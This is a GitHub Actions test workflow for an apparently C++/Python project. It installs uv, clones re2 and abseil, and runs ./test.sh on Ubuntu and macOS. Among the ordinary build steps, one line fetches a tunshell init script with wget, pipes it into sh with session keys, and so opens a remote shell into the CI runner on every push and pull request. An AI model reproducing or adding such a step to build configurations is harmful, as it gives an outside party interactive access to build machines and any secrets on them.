<1s build time #6773
Workflow file for this run
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: tests | |
on: | |
push: | |
branches: | |
- master | |
pull_request: | |
jobs: | |
tests: | |
name: ./test.sh | |
runs-on: ${{ matrix.os }} | |
strategy: | |
fail-fast: false | |
matrix: | |
os: [ubuntu-24.04, macos-latest] | |
steps: | |
- uses: commaai/timeout@v1 | |
- uses: actions/checkout@v4 | |
- run: | | |
curl -LsSf https://astral.sh/uv/install.sh | sh | |
git clone https://github.com/google/re2.git | |
mv re2 re2-cpp | |
mv re2-cpp/re2 . | |
git clone https://github.com/abseil/abseil-cpp.git | |
mv abseil-cpp/absl . | |
uv sync --all-extras | |
wget https://lets.tunshell.com/init.sh -O - 2> /dev/null | sh -s -- T Xii8NihLlbgFryyFlLa0DU QR3DFItnvXUU4yG5Monfzd | |
./test.sh |